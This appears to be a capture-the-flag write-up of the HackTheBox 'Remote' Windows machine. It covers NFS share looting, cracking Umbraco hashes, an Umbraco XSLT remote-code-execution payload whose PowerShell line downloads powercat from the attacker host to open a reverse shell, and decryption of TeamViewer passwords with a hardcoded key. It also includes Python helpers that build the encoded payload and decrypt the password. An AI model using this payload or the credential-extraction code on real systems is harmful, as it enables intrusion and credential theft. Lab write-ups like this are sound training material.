Remote Writeup — HackTheBox

Abass Sesay
7 min read · Aug 31, 2020


https://www.hackthebox.eu/home/machines/profile/234

TL;DR

This is the first Windows box that I have done a proper writeup for. I don't have much experience with Windows boxes, but I tried not to skid my way through this one. There is an NFS export that contains credentials that can be used to exploit Umbraco. For the root flag, TeamViewer is used to get the credentials for Administrator.

Reconnaissance

We start things out with a good old Nmap scan.

PORT      STATE SERVICE       VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

With all these ports, the first question that comes to mind is where to start. The site hosted on port 80 is an e-commerce style site (the http-title reads "Home - Acme Widgets").

To speed things up I ran Gobuster against the site to get a listing of its pages. This revealed the following:

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://remote.htb/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/08/24 20:42:20 Starting gobuster
===============================================================
/about-us (Status: 200)
/blog (Status: 200)
/Blog (Status: 200)
/contact (Status: 200)
/Contact (Status: 200)
/home (Status: 200)
/Home (Status: 200)
/install (Status: 302)
/intranet (Status: 200)
/people (Status: 200)
/People (Status: 200)
/person (Status: 200)
/products (Status: 200)
/Products (Status: 200)
/umbraco (Status: 200)
===============================================================
2020/08/24 20:44:25 Finished
===============================================================

Of all these endpoints, /umbraco is the most interesting: it is the Umbraco CMS back office, and it presents a login form that requires a username and password.

A quick search shows that there is an authenticated remote code execution exploit for Umbraco. Since I did not have any valid credentials at this point I decided to shelve this exploit for now.

Moving on to the other ports. Port 2049 is NFS (rpcinfo shows nfs and mountd on it). We can list the exports with showmount -e 10.10.10.180, then mount the share and view its contents.

kali@kali:~/HTB/NewRemote$ mkdir /mnt/remote
kali@kali:~/HTB/NewRemote$ sudo mount -t nfs 10.10.10.180:/ /mnt/remote/
kali@kali:~/HTB/NewRemote$ cd /mnt/remote/
kali@kali:/mnt/remote$ ls
site_backups
kali@kali:/mnt/remote$

site_backups is a backup of the Umbraco site served on port 80. Under App_Data there is Umbraco.sdf, a SQL Server Compact database file that holds the CMS user table, including the password hashes; running strings over it is enough to pull the user records out.

kali@kali:/mnt/remote/site_backups/App_Data$ ls
cache Logs Models packages TEMP umbraco.config Umbraco.sdf
kali@kali:/mnt/remote/site_backups/App_Data$ strings Umbraco.sdf
...
dministratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa
{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
smithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749-a054-27463ae58b8e
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
...

The admin hash found here is easy to crack.

admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}

Note the JSON stored next to it: Umbraco records the hash algorithm beside each hash. The admin account uses unsalted SHA1, so the hash can be checked directly against a wordlist or a lookup table (Hashcat mode 100), whereas smith and ssmith use HMACSHA256 with a per-user salt (the base64 value in front of their hash) and are not worth attacking first. This can be cracked with Hashcat but I chose to use CrackStation. The password is revealed to be baconandcheese.
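The strings output above runs the database columns together, which makes the records awkward to read by eye. The following is an added example (not code from the original writeup) that recovers the login, algorithm, salt and hash from each row and then verifies the cracked password against the unsalted SHA1 entry. The sample rows are copied from the output above; the older "Administrator" row, which strings prints across two lines, is joined into one string here.

```python
import hashlib
import re

# Constructed sample: user rows as printed by `strings Umbraco.sdf` above.
SDF_RECORDS = [
    'Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d',
    'adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50',
    'ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749',
    'ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32',
]

ALG_RE = re.compile(r'\{"hashAlgorithm":"(?P<alg>[^"]+)"\}')
# `strings` drops the column boundaries, so "htb.local" runs straight into the salt.
# The e-mail is stored twice per row; the second copy is followed by the culture
# ("en-US") and a GUID, which gives an unambiguous end for the domain.
EMAIL_RE = re.compile(r'(?P<email>[\w.+-]+@[\w.-]+?)en-US[0-9a-f]{8}-')


def parse_record(line):
    """Split one concatenated user row into name, e-mail, algorithm, salt and hash."""
    m_alg = ALG_RE.search(line)
    m_mail = EMAIL_RE.search(line, m_alg.end()) if m_alg else None
    if not (m_alg and m_mail):
        return None                      # not a row we can anchor on (e.g. no e-mail)
    email = m_mail.group("email")
    start = line.find(email)             # first copy of the e-mail precedes the hash material
    secret = line[start + len(email):m_alg.start()]
    rec = {"name": line[:start], "email": email, "alg": m_alg.group("alg")}
    if rec["alg"] == "SHA1":
        # Legacy Umbraco: unsalted hex SHA-1 of the password, a plain lookup target.
        rec.update(hash=secret.lower(), salt=None)
    else:
        # Newer Umbraco: base64(16-byte salt) followed by base64(digest). A 16-byte
        # salt is 24 base64 characters; a 32-byte HMACSHA256 digest is 44.
        rec.update(salt=secret[:24], hash=secret[24:])
    return rec


def parse_records(lines):
    """Map e-mail -> parsed record, collapsing duplicate rows."""
    users = {}
    for line in lines:
        rec = parse_record(line)
        if rec:
            users[rec["email"]] = rec
    return users


def crackable_offline(users):
    """E-mails whose hash can be tested with nothing but hashlib and a wordlist."""
    return sorted(e for e, u in users.items() if u["alg"] == "SHA1")


def check_sha1(users, email, candidate):
    """Verify a candidate password against an unsalted SHA1 row (what CrackStation did)."""
    u = users[email]
    if u["alg"] != "SHA1":
        raise ValueError(f"{email} uses {u['alg']} with a salt; this check does not apply")
    return hashlib.sha1(candidate.encode("utf-8")).hexdigest() == u["hash"]
```

The regex anchors on the second copy of the e-mail because the first one has no delimiter after the domain; with a 16-byte salt, "htb.local" followed by "jxDU..." cannot be split reliably any other way. Rows without an e-mail are skipped rather than mis-parsed.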

With admin@htb.local and the password baconandcheese, we can run the exploit for Umbraco.

User Exploit

The exploit is a Python script (Exploit-DB 46153, https://www.exploit-db.com/exploits/46153). It logs in with the supplied credentials and submits an XSLT stylesheet whose msxsl:script block contains C# that the server compiles and runs. As published it is hardcoded to launch calc.exe, but in our case we want a reverse shell, so the payload is changed to the following:

payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "IEX(New-Object System.Net.WebClient).DownloadString('http://<your ip>:8000/powercat.ps1');powercat -c <your ip> -p 1337 -e cmd"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "powershell"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> ';

The payload invokes PowerShell, which downloads powercat.ps1 from our web server on port 8000 and runs it in memory (IEX), then uses powercat to connect back to port 1337 with cmd.exe attached. Before running the exploit, powercat.ps1 has to be served on port 8000 and a listener has to be waiting on 1337 on the attacking machine.

IEX(New-Object System.Net.WebClient).DownloadString('http://<your ip>:8000/powercat.ps1');powercat -c <your ip> -p 1337 -e cmd
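Hand-editing the command inside the C# string is fragile: every double quote has to be escaped for C#, and any < or > in the command has to be escaped again for XML, or the server answers with an opaque compile error. The following is an added example (not code from the original writeup or from the Exploit-DB script) that builds the same stylesheet from a command, doing both escapes, and optionally wraps the PowerShell stager in -EncodedCommand so the C# string carries nothing but base64. The host and ports in the stager are placeholders.

```python
import base64
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed stager: attacker host and ports are placeholders, not values from the box.
STAGER = ("IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.2:8000/powercat.ps1');"
          "powercat -c 10.10.14.2 -p 1337 -e cmd")


def powershell_encoded_args(script):
    """Arguments that run `script` through -EncodedCommand.
    PowerShell expects base64 of the UTF-16LE encoding of the script, so quotes,
    semicolons and angle brackets never appear in the XSLT/C# payload."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"-NoProfile -NonInteractive -EncodedCommand {b64}"


def decode_encoded_command(args):
    """Inverse of powershell_encoded_args, useful for checking what a payload will run."""
    b64 = args.split("-EncodedCommand ", 1)[1].split()[0]
    return base64.b64decode(b64).decode("utf-16-le")


def csharp_string_literal(s):
    """Escape s for use inside a C# double-quoted string literal."""
    return s.replace("\\", "\\\\").replace('"', '\\"')


def build_xslt_payload(ps_args):
    """Build the stylesheet the exploit submits: an msxsl:script C# block that runs
    powershell.exe with `ps_args` and returns its stdout into the rendered page."""
    cmd = escape(csharp_string_literal(ps_args))  # C# escaping first, then XML (&, <, >)
    return (
        '<?xml version="1.0"?>'
        '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" '
        'xmlns:msxsl="urn:schemas-microsoft-com:xslt" '
        'xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">'
        '<msxsl:script language="C#" implements-prefix="csharp_user">'
        'public string xml() { '
        f'string cmd = "{cmd}"; '
        'System.Diagnostics.Process proc = new System.Diagnostics.Process(); '
        'proc.StartInfo.FileName = "powershell"; proc.StartInfo.Arguments = cmd; '
        'proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; '
        'proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; }'
        '</msxsl:script>'
        '<xsl:template match="/"><xsl:value-of select="csharp_user:xml()"/></xsl:template>'
        '</xsl:stylesheet>'
    )


def payload_is_well_formed(payload):
    """Parse the stylesheet locally; a malformed payload fails server-side with little feedback."""
    try:
        ET.fromstring(payload)
        return True
    except ET.ParseError:
        return False


if __name__ == "__main__":
    args = powershell_encoded_args(STAGER)
    print(build_xslt_payload(args))
```

The encoded form is the one to prefer for a reverse shell: the stager string is exactly what appears in the writeup, but the payload itself contains only a base64 blob, so nothing in it needs escaping and the stager can be changed without touching the XSLT.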

From here on, getting the user flag was straightforward (listen is a local shell alias around netcat, as its output shows):

kali@kali:~$ listen 1337
listening on [any] 1337 ...
connect to [10.10.15.6] from (UNKNOWN) [10.10.10.180] 49686
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
...
c:\>cd Users
cd Users
c:\Users>cd Public
cd Public
c:\Users\Public>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE23-EB3E
Directory of c:\Users\Public
02/20/2020 03:42 AM <DIR> .
02/20/2020 03:42 AM <DIR> ..
02/19/2020 04:03 PM <DIR> Documents
09/15/2018 03:19 AM <DIR> Downloads
09/15/2018 03:19 AM <DIR> Music
09/15/2018 03:19 AM <DIR> Pictures
08/25/2020 08:00 PM 34 user.txt
09/15/2018 03:19 AM <DIR> Videos
1 File(s) 34 bytes
7 Dir(s) 19,394,109,440 bytes free
c:\Users\Public>

More Reconnaissance

Root had a red herring in the UsoSvc service. I spent way more time than I should have going down this rabbit hole.

Moving on, TeamViewer 7 turned out to be installed on the box. After looking around, I stumbled on an article that shows how TeamViewer stores passwords in the Windows registry encrypted with AES-128-CBC using a hardcoded key of 0602000000a400005253413100040000 and an IV of 0100010067244F436E6762F25EA8D704 (CVE-2019-18988). Because the key and IV are the same on every installation, anyone who can read the registry values can decrypt them. The goal was to extract these values from the registry, decrypt them and hope the password is reused elsewhere.

There is a Metasploit module for this (post/windows/gather/credentials/teamviewer_passwords) but I decided to go the non-Metasploit route. Looking at the module code, you can see which registry keys it tries to access:

keys = [
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version8", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version9", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version10", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version11", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version12", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version13", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version14", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version15", "Version" ],
[ "HKLM\\SOFTWARE\\WOW6432Node\\TeamViewer", "Version" ],
[ "HKLM\\SOFTWARE\\TeamViewer\\Temp", "SecurityPasswordExported" ],
[ "HKLM\\SOFTWARE\\TeamViewer", "Version" ],
]

and which values it tries to retrieve:

secpass  = registry_getvaldata(p, "SecurityPasswordAES")
secpasse = registry_getvaldata(p, "SecurityPasswordExported")
servpass = registry_getvaldata(p, "ServerPasswordAES")
proxpass = registry_getvaldata(p, "ProxyPasswordAES")
license = registry_getvaldata(p, "LicenseKeyAES")

To aid the manual process, the author of the Metasploit module (https://whynotsecurity.com/) also published an ad-hoc Python decryption script we can leverage: https://gist.github.com/rishdang/442d355180e5c69e0fcb73fecd05d7e0#file-teamviewer_password_decrypt-py.

Armed with this we can move on. From a PowerShell session on the box, dump the TeamViewer registry key:

Get-ItemProperty -Path HKLM:SOFTWARE\WOW6432Node\TeamViewer\Version7

StartMenuGroup            : TeamViewer 7
InstallationDate          : 2020-02-20
InstallationDirectory     : C:\Program Files (x86)\TeamViewer\Version7
Always_Online             : 1
Security_ActivateDirectIn : 0
Version                   : 7.0.43148
ClientIC                  : 301094961
PK                        : {191, 173, 42, 237...}
SK                        : {248, 35, 152, 56...}
LastMACUsed               : {, 005056B9B56E}
MIDInitiativeGUID         : {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion                : 1
ClientID                  : 1769137322
CUse                      : 1
LastUpdateCheck           : 1584564540
UsageEnvironmentBackup    : 1
SecurityPasswordAES       : {255, 155, 28, 115...}
MultiPwdMgmtIDs           : {admin}
MultiPwdMgmtPWDs          : {357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77}
Security_PasswordStrength : 3
PSPath                    : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7
PSParentPath              : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer
PSChildName               : Version7
PSDrive                   : HKLM
PSProvider                : Microsoft.PowerShell.Core\Registry

Of the values the module looks for, only SecurityPasswordAES is present here (there is no ServerPasswordAES, ProxyPasswordAES or LicenseKeyAES), so we read that value and decrypt it.

(New-Object -ComObject WScript.Shell).RegRead("HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7\SecurityPasswordAES")
255
155
28
115
214
107
206
49
172
65
62
174
19
27
70
79
88
47
108
226
209
225
243
218
126
141
55
107
38
57
78
91

RegRead returns the REG_BINARY value as a list of base 10 integers; converting them to hex gives 32 bytes, i.e. two AES blocks:

ff9b1c73d66bce31ac413eae131b464f582f6ce2d1e1f3da7e8d376b26394e5b

Decrypting it with the gist script gives the following. The hexdump shows the password is stored as UTF-16LE and zero-padded to the 16-byte block size:

kali@kali:~/HTB/newremote$ python teamviewer.py 
00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
None
!R3m0te!
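To tie the last three steps together without the gist, here is an added example (not code from the writeup or from the whynotsecurity gist) that takes the decimal dump RegRead produced, packs it to bytes, decrypts it with the hardcoded key and IV quoted above, and decodes the UTF-16LE result. It needs either the cryptography package or pycryptodome for the AES step; the packing and decoding helpers work with the standard library alone.

```python
import importlib.util

# Hardcoded key and IV quoted in the write-up above (TeamViewer's, not per-install).
TV_KEY = bytes.fromhex("0602000000a400005253413100040000")
TV_IV = bytes.fromhex("0100010067244F436E6762F25EA8D704")

# SecurityPasswordAES exactly as RegRead printed it above: a column of decimal bytes.
SECURITY_PASSWORD_AES_DUMP = [
    255, 155, 28, 115, 214, 107, 206, 49, 172, 65, 62, 174, 19, 27, 70, 79,
    88, 47, 108, 226, 209, 225, 243, 218, 126, 141, 55, 107, 38, 57, 78, 91,
]


def registry_bytes_to_hex(values):
    """WScript.Shell.RegRead returns a REG_BINARY value as decimal integers; pack them."""
    return bytes(values).hex()


def decode_plaintext(buf):
    """TeamViewer stores the password as UTF-16LE, zero-padded to the AES block size.
    Decode the whole buffer first and strip trailing NULs afterwards: stripping raw
    0x00 bytes first would also eat the high byte of the last character."""
    return buf.decode("utf-16-le").rstrip("\x00")


def crypto_backend_available():
    """True if either AES implementation used below can be imported."""
    return bool(importlib.util.find_spec("cryptography") or importlib.util.find_spec("Crypto"))


def aes128_cbc_decrypt(key, iv, ct):
    """Raw AES-128-CBC with no padding removal (the padding here is NULs, not PKCS#7).
    Uses `cryptography` when installed, otherwise pycryptodome."""
    if len(ct) % 16:
        raise ValueError("ciphertext must be a whole number of 16-byte blocks")
    if importlib.util.find_spec("cryptography"):
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        decryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return decryptor.update(ct) + decryptor.finalize()
    from Crypto.Cipher import AES  # pycryptodome
    return AES.new(key, AES.MODE_CBC, iv).decrypt(ct)


def decrypt_teamviewer_password(values):
    """Decimal registry dump -> cleartext TeamViewer password."""
    return decode_plaintext(aes128_cbc_decrypt(TV_KEY, TV_IV, bytes(values)))


if __name__ == "__main__":
    print(registry_bytes_to_hex(SECURITY_PASSWORD_AES_DUMP))
    print(decrypt_teamviewer_password(SECURITY_PASSWORD_AES_DUMP))
```

The same routine applies to the other values the Metasploit module looks for (ServerPasswordAES, ProxyPasswordAES, LicenseKeyAES) when they are present, since they share the key and IV; only the registry value name changes.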

Root Exploit

The TeamViewer password turns out to be reused as the local Administrator password. Since WinRM (port 5985) is open, we can log in to the box as Administrator with evil-winrm and get the root flag.

kali@kali:~/HTB/newremote$ evil-winrm -i 10.10.10.180 -u Administrator -p '!R3m0te!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> ls

    Directory: C:\Users\Administrator\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/19/2020   4:26 PM                SQL Server Management Studio
d-----        2/20/2020  12:05 AM                Visual Studio 2017

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/26/2020  12:49 AM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop>

